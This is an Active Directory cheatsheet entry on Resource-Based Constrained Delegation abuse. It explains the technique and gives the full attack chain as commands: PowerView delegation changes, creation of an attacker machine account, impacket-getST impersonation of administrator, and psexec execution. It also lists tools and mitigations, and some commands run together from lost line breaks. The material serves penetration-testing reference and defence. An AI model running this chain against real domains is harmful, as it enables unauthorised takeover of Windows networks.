Rbcd
Active Directory cheatsheet — Active Directory enumeration and attack techniques.
Overview
Resource-Based Constrained Delegation (RBCD) abuse allows an attacker with GenericWrite/GenericAll over a computer object to configure msDS-AllowedToActOnBehalfOfOtherIdentity to permit delegation from a controlled account.
This enables the attacker to compromise the target computer by authenticating as any user (e.g., Domain Admin) via S4U2Proxy.
Category: Active Directory — Active Directory enumeration and attack techniques.
Key Commands & Payloads
The following commands and payloads are commonly used when testing for or exploiting Rbcd:
Set-DomainRBCD -Identity WIN10$ -DelegateFrom 'ATTACKER$'$pass=ConvertTo-SecureString 'Password123!' -AsPlainText -Force; New-ADComputer -Name ATTACKER -AccountPassword $pass -Enabled $trueimpacket-getST -spn cifs/win10.target.local -impersonate administrator -dc-ip 10.10.10.10 'target.local/ATTACKER$:Password123!'impacket-psexec -k -no-pass target.local/administrator@win10.target.localTools & Techniques
Recommended tools for Rbcd:
- PowerView: Set-DomainRBCD for delegation modification
- Impacket getST: request TGS with S4U2Proxy
- Impacket psexec/smbexec: execute with ticket
- Requires: GenericWrite on target computer object
Prevention & Mitigation
Security recommendations to prevent Rbcd:
- Restrict who has GenericWrite/GenericAll on computer objects
- Audit msDS-AllowedToActOnBehalfOfOtherIdentity modifications
- Monitor for new computer accounts created by non-admin users
- Use Group Policy to review computer delegation settings
References
Additional resources: